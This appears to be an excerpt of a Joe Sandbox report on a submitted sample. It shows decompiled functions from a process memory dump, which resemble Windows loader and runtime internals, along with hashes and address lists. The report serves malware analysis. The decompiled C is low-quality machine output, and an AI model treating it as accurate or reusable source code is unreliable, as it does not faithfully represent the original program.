                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: a64fd5380c033db47384951b045b6a02b1438618baf41c61d961763f2295778b
                                                                                                                              • Instruction ID: f4ca8c05c114dbf0837bb67c7ea781698e73254ac1cf137e430457f164e28cd0
                                                                                                                              • Opcode Fuzzy Hash: a64fd5380c033db47384951b045b6a02b1438618baf41c61d961763f2295778b
                                                                                                                              • Instruction Fuzzy Hash: 12812E75A04305BFDB21DFA5CC84EAFBBF8EF48720F110529E615A71A1DA71B940CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 37%
                                                                                                                              			E1D73B420(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr* _t46;
				intOrPtr _t47;
				void* _t49;
				intOrPtr _t51;
				intOrPtr _t61;
				intOrPtr* _t62;
				signed int _t69;
				void* _t71;

				_t40 = __ebx;
				_t71 = (_t69 & 0xfffffff8) - 0x14;
				_push(__ebx);
				_t61 = _a8;
				_push(__edi);
				_t57 = _t61 + 0x14;
				L1D752330(_t25, _t61 + 0x14);
				_t27 = _t61 + 0x18;
				_t62 =  *_t27;
				if(_t62 == _t27) {
					_t62 = 0;
					goto L4;
				} else {
					if( *((intOrPtr*)(_t62 + 4)) != _t27) {
						L11:
						_t49 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						if( *0x1d835da8 == 0) {
							E1D73B566(_t49, _v0, _t57, _t62);
							return E1D73B502(_v0);
						}
						return _t27;
					} else {
						_t51 =  *_t62;
						if( *((intOrPtr*)(_t51 + 4)) != _t62) {
							goto L11;
						} else {
							 *_t27 = _t51;
							 *((intOrPtr*)(_t51 + 4)) = _t27;
							L4:
							_t28 = E1D7524D0(_t57);
							_t42 = _a8;
							if((_t40 & 0xffffff00 |  *_t27 != _t27) != 0) {
								_t28 = E1D751C8F(_t42, _t42,  *((intOrPtr*)(_a4 + 0x48)), _t57, 1, 0);
							}
							if(_t62 != 0) {
								_t10 = _t62 - 0x10; // -16
								_t29 = _t10;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t46 =  *((intOrPtr*)(_t29 + 0x18));
								asm("lock xadd [ecx+0x4], eax");
								if((_t29 | 0xffffffff) == 0) {
									_t31 =  *0x1d836644; // 0x0
									E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t31 + 0x300000,  *_t46);
								}
								_t47 = _a4;
								 *((intOrPtr*)(_t47 + 0x30)) =  *((intOrPtr*)(_t42 + 0x20));
								 *((intOrPtr*)(_t47 + 0x34)) = _t42;
								 *0x1d8391e0(_t47, _t42,  *((intOrPtr*)(_t71 + 0x18)), _t71 + 0x18);
								_t28 =  *((intOrPtr*)( *((intOrPtr*)(_t42 + 0x20))))();
							}
							return _t28;
						}
					}
				}
			}






















                                                                                                                              0x1d73b420
                                                                                                                              0x1d73b428
                                                                                                                              0x1d73b42b
                                                                                                                              0x1d73b42d
                                                                                                                              0x1d73b430
                                                                                                                              0x1d73b431
                                                                                                                              0x1d73b435
                                                                                                                              0x1d73b43a
                                                                                                                              0x1d73b43d
                                                                                                                              0x1d73b441
                                                                                                                              0x1d73b4d0
                                                                                                                              0x00000000
                                                                                                                              0x1d73b447
                                                                                                                              0x1d73b44a
                                                                                                                              0x1d73b4d4
                                                                                                                              0x1d73b4d6
                                                                                                                              0x1d73b4d7
                                                                                                                              0x1d73b4d9
                                                                                                                              0x1d73b4da
                                                                                                                              0x1d73b4db
                                                                                                                              0x1d73b4dc
                                                                                                                              0x1d73b4dd
                                                                                                                              0x1d73b4de
                                                                                                                              0x1d73b4df
                                                                                                                              0x1d73b4ec
                                                                                                                              0x1d73b4f1
                                                                                                                              0x00000000
                                                                                                                              0x1d73b4f9
                                                                                                                              0x1d73b4ff
                                                                                                                              0x1d73b450
                                                                                                                              0x1d73b450
                                                                                                                              0x1d73b455
                                                                                                                              0x00000000
                                                                                                                              0x1d73b457
                                                                                                                              0x1d73b457
                                                                                                                              0x1d73b459
                                                                                                                              0x1d73b45c
                                                                                                                              0x1d73b462
                                                                                                                              0x1d73b469
                                                                                                                              0x1d73b46c
                                                                                                                              0x1d73b4c9
                                                                                                                              0x1d73b4c9
                                                                                                                              0x1d73b470
                                                                                                                              0x1d73b472
                                                                                                                              0x1d73b472
                                                                                                                              0x1d73b47b
                                                                                                                              0x1d73b47c
                                                                                                                              0x1d73b47d
                                                                                                                              0x1d73b47e
                                                                                                                              0x1d73b47f
                                                                                                                              0x1d73b485
                                                                                                                              0x1d73b48a
                                                                                                                              0x1d79ccdd
                                                                                                                              0x1d79ccf1
                                                                                                                              0x1d79ccf1
                                                                                                                              0x1d73b490
                                                                                                                              0x1d73b496
                                                                                                                              0x1d73b4a2
                                                                                                                              0x1d73b4ac
                                                                                                                              0x1d73b4b2
                                                                                                                              0x1d73b4b2
                                                                                                                              0x1d73b4ba
                                                                                                                              0x1d73b4ba
                                                                                                                              0x1d73b455
                                                                                                                              0x1d73b44a

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 11c5fc05d356c91210817f215ebd42e650e3848589cd3c973dfdb5b5e9b2ded7
                                                                                                                              • Instruction ID: 6b180ebc5e6ddae8058a9813f715c1ea4ba25bd30e818710bf322ff7cd28d6c5
                                                                                                                              • Opcode Fuzzy Hash: 11c5fc05d356c91210817f215ebd42e650e3848589cd3c973dfdb5b5e9b2ded7
                                                                                                                              • Instruction Fuzzy Hash: 2B310272500208AFC711CF14D880A7A77A5FF85775F11826AEE488F2A2D731ED42CBD6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D77B890 Relevance: 1.6, APIs: 1, Instructions: 86timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 84%
                                                                                                                              			E1D77B890(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v32;
				void* _v52;
				void* _t28;
				char* _t31;
				void* _t33;
				char* _t37;
				char* _t46;
				void* _t63;
				signed int _t69;
				signed int _t70;

				_t70 = _t69 & 0xfffffff8;
				_push(__ecx);
				_t66 = _a8;
				_t63 = _a8 - 0x78;
				_t28 = E1D753C40();
				_t46 = 0x7ffe0386;
				if(_t28 != 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t31 = 0x7ffe0386;
				}
				if( *_t31 != 0) {
					E1D814B67( *((intOrPtr*)(_t63 + 0x5c)), _t66,  *((intOrPtr*)(_t63 + 0x30)),  *((intOrPtr*)(_t63 + 0x34)),  *((intOrPtr*)(_t63 + 0x3c)));
				}
				_t33 = E1D747072(_a4, _t63, 1);
				if(_t33 != 0) {
					if(E1D753C40() != 0) {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t37 = _t46;
					}
					if( *_t37 != 0) {
						E1D814C59( *((intOrPtr*)(_t63 + 0x5c)), _t66,  *((intOrPtr*)(_t63 + 0x30)),  *((intOrPtr*)(_t63 + 0x34)),  *((intOrPtr*)(_t63 + 0x3c)));
					}
					E1D746F4C(_t70 + 0x10,  *((intOrPtr*)(_t63 + 0x30)),  *((intOrPtr*)(_t63 + 0x34)),  *((intOrPtr*)(_t63 + 0x3c)));
					 *0x1d8391e0(_a4,  *((intOrPtr*)(_t63 + 0x34)));
					 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x30))))();
					if(E1D753C40() != 0) {
						_t46 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t46 != 0) {
						E1D814CD2( *((intOrPtr*)(_t63 + 0x5c)), _a8,  *((intOrPtr*)(_t63 + 0x30)),  *((intOrPtr*)(_t63 + 0x34)),  *((intOrPtr*)(_t63 + 0x3c)));
					}
					_t33 = E1D746ECF( *((intOrPtr*)(_t70 + 0xc)));
				}
				return _t33;
			}













                                                                                                                              0x1d77b895
                                                                                                                              0x1d77b898
                                                                                                                              0x1d77b89b
                                                                                                                              0x1d77b89f
                                                                                                                              0x1d77b8a2
                                                                                                                              0x1d77b8a7
                                                                                                                              0x1d77b8ae
                                                                                                                              0x1d7b7461
                                                                                                                              0x1d77b8b4
                                                                                                                              0x1d77b8b4
                                                                                                                              0x1d77b8b4
                                                                                                                              0x1d77b8b9
                                                                                                                              0x1d7b7479
                                                                                                                              0x1d7b7479
                                                                                                                              0x1d77b8c6
                                                                                                                              0x1d77b8cd
                                                                                                                              0x1d77b8d6
                                                                                                                              0x1d7b748c
                                                                                                                              0x1d77b8dc
                                                                                                                              0x1d77b8dc
                                                                                                                              0x1d77b8dc
                                                                                                                              0x1d77b8e1
                                                                                                                              0x1d7b74a4
                                                                                                                              0x1d7b74a4
                                                                                                                              0x1d77b8f4
                                                                                                                              0x1d77b904
                                                                                                                              0x1d77b90a
                                                                                                                              0x1d77b913
                                                                                                                              0x1d7b74b7
                                                                                                                              0x1d7b74b7
                                                                                                                              0x1d77b91c
                                                                                                                              0x1d7b74d1
                                                                                                                              0x1d7b74d1
                                                                                                                              0x1d77b926
                                                                                                                              0x1d77b926
                                                                                                                              0x1d77b931

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 8c893163f2bd4a44056c9c0efcf6982a82ebbd0aa05dee27c81611290c7e6d44
                                                                                                                              • Instruction ID: d71148418be1cd9e355141bb04c50b3b115695209b3edfee46c44ec3922dd2e7
                                                                                                                              • Opcode Fuzzy Hash: 8c893163f2bd4a44056c9c0efcf6982a82ebbd0aa05dee27c81611290c7e6d44
                                                                                                                              • Instruction Fuzzy Hash: 2731D139605A56FFDB029B24D948AAAFB66FF44720F419052EE144BA61C731F830CBC2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D743536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 65%
                                                                                                                              			E1D743536(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int* _v8;
				char _v9;
				char _v17;
				signed int* _v20;
				void* _t24;
				signed int _t26;
				signed int* _t28;
				signed int* _t38;
				signed int _t39;
				intOrPtr* _t47;
				signed int _t49;
				signed int _t54;
				void* _t62;

				_t38 = __ecx;
				_t47 = __edx;
				_v8 = __ecx;
				if(_a4 != 0 || _a8 != 0) {
					_v9 = 0;
					_t54 = 0;
					L9:
					 *0x1d8391e0(_a4, _a8);
					_t26 =  *_t47();
					_t39 = _t26;
					if(_t39 != 0) {
						 *((intOrPtr*)(_t39 + 0x34)) = 1;
						if(_v17 != 0) {
							_t49 = 0;
							L1D752330(_t26, 0x1d8367c4);
							_t28 = _v20;
							if( *_t28 == _t54) {
								 *_t28 = _t39;
								 *((intOrPtr*)(_t39 + 0x34)) =  *((intOrPtr*)(_t39 + 0x34)) + 1;
								if(_t54 != 0) {
									 *(_t54 + 0x34) =  *(_t54 + 0x34) - 1;
									asm("sbb edi, edi");
									_t49 =  !( ~( *(_t54 + 0x34))) & _t54;
								}
							}
							E1D7524D0(0x1d8367c4);
							if(_t49 != 0) {
								E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t49);
							}
						}
						_t26 = _t39;
					}
					goto L17;
				} else {
					_v9 = 1;
					L1D752330(_t24, 0x1d8367c4);
					_t54 =  *_t38;
					if(_t54 == 0) {
						L7:
						E1D7524D0(0x1d8367c4);
						goto L9;
					}
					_t62 =  *((intOrPtr*)(_t54 + 0x3c)) -  *0x1d83690c; // 0x0
					if(_t62 != 0 ||  *((char*)(_t54 + 0x48)) == 0 &&  *((intOrPtr*)(_t54 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L7;
					} else {
						 *(_t54 + 0x34) =  *(_t54 + 0x34) + 1;
						E1D7524D0(0x1d8367c4);
						_t26 = _t54;
						L17:
						return _t26;
					}
				}
			}
















                                                                                                                              0x1d743547
                                                                                                                              0x1d74354a
                                                                                                                              0x1d74354c
                                                                                                                              0x1d743550
                                                                                                                              0x1d7435b2
                                                                                                                              0x1d7435b7
                                                                                                                              0x1d7435b9
                                                                                                                              0x1d7435c1
                                                                                                                              0x1d7435c7
                                                                                                                              0x1d7435c9
                                                                                                                              0x1d7435cd
                                                                                                                              0x1d7435d4
                                                                                                                              0x1d7435db
                                                                                                                              0x1d7435e2
                                                                                                                              0x1d7435e4
                                                                                                                              0x1d7435e9
                                                                                                                              0x1d7435ef
                                                                                                                              0x1d7435f1
                                                                                                                              0x1d7435f3
                                                                                                                              0x1d7435f8
                                                                                                                              0x1d7435fa
                                                                                                                              0x1d743602
                                                                                                                              0x1d743606
                                                                                                                              0x1d743606
                                                                                                                              0x1d7435f8
                                                                                                                              0x1d74360d
                                                                                                                              0x1d743614
                                                                                                                              0x1d743622
                                                                                                                              0x1d743622
                                                                                                                              0x1d743614
                                                                                                                              0x1d743627
                                                                                                                              0x1d743627
                                                                                                                              0x00000000
                                                                                                                              0x1d743558
                                                                                                                              0x1d74355d
                                                                                                                              0x1d743562
                                                                                                                              0x1d743567
                                                                                                                              0x1d74356b
                                                                                                                              0x1d7435a6
                                                                                                                              0x1d7435ab
                                                                                                                              0x00000000
                                                                                                                              0x1d7435ab
                                                                                                                              0x1d743570
                                                                                                                              0x1d743576
                                                                                                                              0x00000000
                                                                                                                              0x1d743592
                                                                                                                              0x1d743592
                                                                                                                              0x1d74359a
                                                                                                                              0x1d74359f
                                                                                                                              0x1d743629
                                                                                                                              0x1d74362f
                                                                                                                              0x1d74362f
                                                                                                                              0x1d743576

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 0bb5b160a1fe9a68960e10bf0c227a98e20585fbbd145069f624dea44b34c31a
                                                                                                                              • Instruction ID: 3848773f90d666b256f113486569b7e310baab6e6e5fda9d94f47265d7d0fe84
                                                                                                                              • Opcode Fuzzy Hash: 0bb5b160a1fe9a68960e10bf0c227a98e20585fbbd145069f624dea44b34c31a
                                                                                                                              • Instruction Fuzzy Hash: 6521E131545641AFD722AF18D985B7ABBA0FF81B34F61851AE84E0B651C770FC48CB93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D751BE7 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 57%
                                                                                                                              			E1D751BE7(intOrPtr __ecx) {
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				signed int _t22;
				intOrPtr* _t26;
				intOrPtr* _t27;
				signed int _t37;
				signed int _t40;
				intOrPtr _t41;
				signed int _t47;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;

				_t53 = __ecx;
				_v12 = __ecx;
				_t2 = _t53 + 0x20; // 0x20
				E1D76DB40(_t2, 1, 0);
				_t3 = _t53 + 0x8c; // 0x8c
				_t47 =  *_t3;
				_t52 = 2;
				do {
					_t40 = _t47;
					_t37 = _t47 & 0x00000001;
					_t22 = _t40;
					asm("lock cmpxchg [esi], edx");
					_t47 = _t22;
				} while (_t47 != _t40);
				_t55 = _v12;
				if(_t37 != 0) {
					asm("lock xadd [esi], edi");
					_t41 =  *[fs:0x18];
					 *((intOrPtr*)(_t55 + 0x50)) =  *((intOrPtr*)(_t41 + 0x19c));
					 *((intOrPtr*)(_t55 + 0x54)) =  *((intOrPtr*)(_t41 + 0x1a0));
					_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t26 != 0) {
						if( *_t26 == 0) {
							goto L4;
						} else {
							_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							goto L5;
						}
						L12:
					} else {
						L4:
						_t27 = 0x7ffe0386;
					}
					L5:
					if( *_t27 != 0) {
						_t16 = _t55 + 0x78; // 0x7b
						E1D814BE0( *((intOrPtr*)(_t55 + 0x5c)), _t16,  *((intOrPtr*)(_t55 + 0x30)),  *((intOrPtr*)(_t55 + 0x34)),  *((intOrPtr*)(_t55 + 0x3c)));
					}
					_t11 = _t55 + 0x78; // 0x7b
					_t22 = E1D751C8F(_t37, _t11,  *((intOrPtr*)(_t55 + 0x5c)), _t52,  *((intOrPtr*)(_t55 + 0x74)), 0) | 0xffffffff;
					asm("lock xadd [esi], eax");
					if(_t22 == 0) {
						 *0x1d8391e0(_t55);
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t55 + 4))))))();
					}
				}
				return _t22;
				goto L12;
			}
















                                                                                                                              0x1d751bf1
                                                                                                                              0x1d751bf9
                                                                                                                              0x1d751bfc
                                                                                                                              0x1d751bff
                                                                                                                              0x1d751c04
                                                                                                                              0x1d751c0a
                                                                                                                              0x1d751c10
                                                                                                                              0x1d751c11
                                                                                                                              0x1d751c11
                                                                                                                              0x1d751c18
                                                                                                                              0x1d751c1d
                                                                                                                              0x1d751c1f
                                                                                                                              0x1d751c23
                                                                                                                              0x1d751c25
                                                                                                                              0x1d751c29
                                                                                                                              0x1d751c2e
                                                                                                                              0x1d751c30
                                                                                                                              0x1d751c34
                                                                                                                              0x1d751c41
                                                                                                                              0x1d751c4a
                                                                                                                              0x1d751c53
                                                                                                                              0x1d751c58
                                                                                                                              0x1d7a5ad2
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5ad8
                                                                                                                              0x1d7a5ae1
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5ae1
                                                                                                                              0x00000000
                                                                                                                              0x1d751c5e
                                                                                                                              0x1d751c5e
                                                                                                                              0x1d751c5e
                                                                                                                              0x1d751c5e
                                                                                                                              0x1d751c63
                                                                                                                              0x1d751c67
                                                                                                                              0x1d7a5af1
                                                                                                                              0x1d7a5afa
                                                                                                                              0x1d7a5afa
                                                                                                                              0x1d751c70
                                                                                                                              0x1d751c7d
                                                                                                                              0x1d751c80
                                                                                                                              0x1d751c84
                                                                                                                              0x1d7a5b0c
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5b12
                                                                                                                              0x1d751c84
                                                                                                                              0x1d751c8e
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 64d807967ccaa5dd738944e16196526529441df990b4e9bdf6a683350c8a5252
                                                                                                                              • Instruction ID: 5a5bb6ec100c4790f0da449fa008c9a239d70ad59e53017529ce1fec7c8af9bf
                                                                                                                              • Opcode Fuzzy Hash: 64d807967ccaa5dd738944e16196526529441df990b4e9bdf6a683350c8a5252
                                                                                                                              • Instruction Fuzzy Hash: B321D336700B409FD722CF2CD880B56B7E5FF88724F15866AD996877A0D775B841CB81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D75DCD1 Relevance: 1.6, APIs: 1, Instructions: 62timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 92%
                                                                                                                              			E1D75DCD1(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				char* _t24;
				signed char* _t30;
				char _t35;
				void* _t45;
				intOrPtr _t48;
				void* _t50;

				_push(0x14);
				_push(0x1d81c2e0);
				E1D797BE4(__ebx, __edi, __esi);
				_t48 = __edx;
				 *((intOrPtr*)(_t50 - 0x20)) = __edx;
				_t45 = __ecx;
				if(E1D753C40() != 0) {
					_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t24 = 0x7ffe0384;
				}
				if( *_t24 != 0) {
					if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
						goto L3;
					}
					if(E1D753C40() == 0) {
						_t30 = 0x7ffe0385;
					} else {
						_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t30 & 0x00000020) == 0) {
						goto L3;
					}
					_t35 = 0;
					E1D7C0227(0x14a3, _t48, 0,  *((intOrPtr*)(_t50 + 8)), 0, 0);
					goto L4;
				} else {
					L3:
					_t35 = 0;
					L4:
					 *((char*)(_t50 - 0x19)) = _t35;
					 *((intOrPtr*)(_t50 - 4)) = _t35;
					 *((intOrPtr*)(_t50 - 0x24)) = 1;
					L1D784CDB();
					 *((char*)(_t50 - 0x19)) = E1D782960(_t45, _t48,  *((intOrPtr*)(_t50 + 8)),  *((intOrPtr*)(_t50 + 0xc)));
					 *((intOrPtr*)(_t50 - 4)) = 0xfffffffe;
					 *((intOrPtr*)(_t50 - 0x24)) = 0;
					E1D75DD4D(_t35, _t48);
					 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0x10));
					return  *((intOrPtr*)(_t50 - 0x19));
				}
			}









                                                                                                                              0x1d75dcd1
                                                                                                                              0x1d75dcd3
                                                                                                                              0x1d75dcd8
                                                                                                                              0x1d75dcdd
                                                                                                                              0x1d75dcdf
                                                                                                                              0x1d75dce2
                                                                                                                              0x1d75dceb
                                                                                                                              0x1d7a94ae
                                                                                                                              0x1d75dcf1
                                                                                                                              0x1d75dcf1
                                                                                                                              0x1d75dcf1
                                                                                                                              0x1d75dcf9
                                                                                                                              0x1d7a94c5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a94d2
                                                                                                                              0x1d7a94e4
                                                                                                                              0x1d7a94d4
                                                                                                                              0x1d7a94dd
                                                                                                                              0x1d7a94dd
                                                                                                                              0x1d7a94ec
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a94f2
                                                                                                                              0x1d7a9501
                                                                                                                              0x00000000
                                                                                                                              0x1d75dcff
                                                                                                                              0x1d75dcff
                                                                                                                              0x1d75dcff
                                                                                                                              0x1d75dd01
                                                                                                                              0x1d75dd01
                                                                                                                              0x1d75dd04
                                                                                                                              0x1d75dd07
                                                                                                                              0x1d75dd10
                                                                                                                              0x1d75dd22
                                                                                                                              0x1d75dd25
                                                                                                                              0x1d75dd2c
                                                                                                                              0x1d75dd33
                                                                                                                              0x1d75dd3e
                                                                                                                              0x1d75dd4a
                                                                                                                              0x1d75dd4a

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 44873c173776e9697d562dd2350a15e3b9f3fec686a0e53ec681f9ad4c02482c
                                                                                                                              • Instruction ID: 492624ffda61fb3383afa165bd89a10561ee60014fedd2eff04ab7bee6349990
                                                                                                                              • Opcode Fuzzy Hash: 44873c173776e9697d562dd2350a15e3b9f3fec686a0e53ec681f9ad4c02482c
                                                                                                                              • Instruction Fuzzy Hash: D1210679A08285DFDB028F9CD444BEEBBA9FF05724F050097E9049B3A1D7799901C767
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7C395B Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 76%
                                                                                                                              			E1D7C395B(intOrPtr __ecx) {
				signed int _v8;
				char _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				short _v1046;
				char _v1048;
				void* _v1056;
				char _v1060;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t49;
				void* _t57;
				intOrPtr _t59;
				intOrPtr _t65;
				intOrPtr _t83;
				void* _t84;
				signed int _t85;
				signed int _t87;
				signed int _t91;
				void* _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t96;
				signed int _t97;
				void* _t99;
				signed int _t101;
				char _t102;
				signed int _t103;
				signed int _t105;

				_t105 = (_t103 & 0xfffffff8) - 0x424;
				_v8 =  *0x1d83b370 ^ _t105;
				_t83 = __ecx;
				_v1040 = __ecx;
				if(__ecx == 0 || E1D761D10( &_v1048, L"CWDIllegalInDLLSearch") < 0) {
					L31:
					_t87 =  *0x7ffe02d5 & 0x000000ff;
					_v1056 = _t87 >> 0x00000004 & 0x00000003;
					if((_t87 & 0x00000030) == 0x30) {
						_v1056 = _v1056 | 0xffffffff;
					}
					goto L33;
				} else {
					_push( &_v1060);
					_push(0x400);
					_t97 =  &_v1036;
					_push(_t97);
					_push(2);
					_push( &_v1048);
					_push(_t83);
					_t101 = E1D782B00();
					if(_t101 < 0) {
						__eflags = _t101 - 0x80000005;
						if(_t101 != 0x80000005) {
							goto L28;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t102 = _v1060;
							_t91 =  *( *[fs:0x30] + 0x18);
							__eflags = _t91;
							if(_t91 == 0) {
								goto L31;
							}
							_t59 =  *0x1d835d78; // 0x0
							_t85 = E1D755D90(_t91, _t91, _t59 + 0x180000, _v1060);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L31;
							}
							_t97 = _t85;
							_push( &_v1060);
							_push(_t102);
							_push(_t85);
							_push(2);
							_push( &_v1048);
							_push(_v1040);
							_t101 = E1D782B00();
							__eflags = _t101;
							if(_t101 >= 0) {
								goto L4;
							}
							__eflags = _t101 - 0x80000005;
							if(_t101 != 0x80000005) {
								goto L26;
							} else {
								E1D753BC0( *( *[fs:0x30] + 0x18), 0, _t85);
								continue;
							}
						}
						goto L31;
					} else {
						_t85 = 0;
						L4:
						_t65 =  *((intOrPtr*)(_t97 + 4));
						if(_t65 == 3 || _t65 == 7) {
							_t92 = 4;
							__eflags = _t65 - _t92;
